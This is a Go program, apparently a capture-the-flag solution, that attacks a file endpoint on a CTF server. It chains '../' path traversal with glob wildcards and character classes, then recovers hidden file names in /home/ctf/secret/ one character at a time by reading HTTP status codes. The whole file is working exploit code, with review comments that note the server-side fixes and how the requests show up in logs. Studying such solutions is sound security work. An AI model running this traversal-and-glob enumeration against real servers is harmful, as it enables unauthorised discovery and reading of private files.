Created
May 19, 2021 12:08
glob_search
package main | |
import ( | |
"fmt" | |
"log" | |
"net/http" | |
"os" | |
"strings" | |
// "net/url" | |
) | |
// Request template for the probe. Every request has the shape
// http://<target><path>?<query>, where the INJECTION placeholder inside query
// is replaced by searchFolder plus a candidate pattern (see formatURL).
//
// NOTE(review): the patterns sent are glob expressions ("[...]" classes and
// "?" wildcards), so the endpoint presumably glob-expands the `name` value
// after following the "../" segments — confirm against the service. On the
// server side the corresponding controls are resolving the canonical path and
// rejecting anything outside the intended directory, and never handing the
// parameter to glob expansion. In access logs these requests stand out as
// "../" runs followed by "[", "]" and "?" in the `name` parameter.
var (
	// target is the host:port of the CTF service.
	target = "ctf.shellz.club:8081"

	// path is the endpoint that receives the file name.
	path = "/file"

	// query holds the `name` parameter: a run of "../" segments followed by
	// the INJECTION placeholder. An earlier note here read: /var/apache2/cgi-bin/
	query = "name=../../.././../../../../../../INJECTION"

	// searchFolder is the directory whose file names are enumerated.
	searchFolder = "/home/ctf/secret/"

	// searchSpace is the candidate alphabet for each file-name position:
	// letters in both cases, ".", digits, the sequence "%20" and "_".
	searchSpace = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz.123456789%20_"

	// maxFileLength is the exclusive upper bound on the name lengths tried
	// by findFiles.
	maxFileLength = 30

	// An earlier variant matched the response body instead of the status code:
	//errorResponse = []byte("That log file doesn't exist")
)
// formatURL builds the request URL for one candidate pattern. It assembles
// http://<target><path>?<query> and replaces the first INJECTION placeholder
// with searchFolder followed by injection. The pattern is inserted verbatim;
// no URL escaping is applied here.
func formatURL(injection string) string {
	template := "http://" + target + path + "?" + query
	return strings.Replace(template, "INJECTION", searchFolder+injection, 1)
}
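// isValidFile reports whether the server answers 200 OK for the URL built
// from filename by formatURL. The status code is the only signal used; an
// earlier variant (left out here) read the body and looked for an error
// string instead.
//
// A transport-level error aborts the program through log.Panicln.
//
// NOTE(review): http.Get goes through http.DefaultClient, which sets no
// timeout, so a stalled server blocks the whole run.
func isValidFile(filename string) bool {
	resp, err := http.Get(formatURL(filename))
	if err != nil {
		log.Panicln(err.Error())
	}
	// The body was previously never closed, so every request leaked its
	// response body and the connection behind it. The body is not read, only
	// released.
	defer resp.Body.Close()

	return resp.StatusCode == http.StatusOK
}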
// binarySearchLetters narrows down which characters of searchSpace can follow
// currentFilename in a file name of the given length, appending every
// surviving single character to *results.
//
// Each step splits searchSpace in two (by byte index) and asks isValidFile
// about the pattern currentFilename + "[half]" + "?" padding, where the
// padding fills the name up to length. A half that matches is searched
// recursively; both halves are always tried, so several characters can be
// reported for the same position. Once a single candidate is left it is
// recorded without a further request, relying on the caller's match for the
// enclosing half.
//
// strings.Repeat panics on a negative count, so len(currentFilename) must be
// less than length.
func binarySearchLetters(currentFilename string, searchSpace string, length int, results *[]string) {
	if len(searchSpace) == 1 {
		*results = append(*results, searchSpace)
		return
	}

	mid := len(searchSpace) / 2
	// One "?" for every position after the one being tested.
	padding := strings.Repeat("?", length-len(currentFilename)-1)

	for _, half := range [2]string{searchSpace[:mid], searchSpace[mid:]} {
		candidate := fmt.Sprintf("%s[%s]%s", currentFilename, half, padding)
		if isValidFile(candidate) {
			binarySearchLetters(currentFilename, half, length, results)
		}
	}
}
// findValidFiles returns every file name of exactly length characters that
// the search can confirm. It grows the set of known prefixes one position at
// a time: for each prefix, binarySearchLetters reports the characters that
// may come next, and each of them yields a new, longer prefix. After length
// rounds the prefixes are complete names.
//
// The current prefix set is logged at the start of every round. The result is
// nil when no name survives, and []string{""} when length is 0.
func findValidFiles(length int) []string {
	log.Printf("Finding filenames with length: %d\n", length)

	fileNames := []string{""}
	for pos := 1; pos <= length; pos++ {
		log.Println(fileNames)

		var extended []string
		for _, prefix := range fileNames {
			var nextChars []string
			binarySearchLetters(prefix, searchSpace, length, &nextChars)
			for _, ch := range nextChars {
				extended = append(extended, prefix+ch)
			}
		}
		// The extended prefixes become the input of the next round.
		fileNames = extended
	}
	return fileNames
}
// findFiles tries every name length from 10 up to, but not including,
// maxFileLength. A length is first checked with a pattern made only of "?"
// wildcards; when the server reports a match, findValidFiles recovers the
// names of that length and each one is logged.
func findFiles() {
	for n := 10; n < maxFileLength; n++ {
		if !isValidFile(strings.Repeat("?", n)) {
			continue
		}
		for _, name := range findValidFiles(n) {
			log.Printf("Found File: %s\n", name)
		}
	}
}
// main routes the program's HTTP traffic through a local proxy and starts
// the search.
func main() {
	// Disabled command-line override for the searched directory:
	//flag.StringVar(&searchFolder, "path", "/var/apache2/html", "path to search")
	//flag.Parse()

	// Local intercepting proxy. The variable is set before any request is
	// made because the default transport takes its proxy from the
	// environment.
	const proxyURL = "http://127.0.0.1:8080"
	// The error is discarded as before: the key and value are fixed strings.
	_ = os.Setenv("HTTP_PROXY", proxyURL)

	findFiles()
}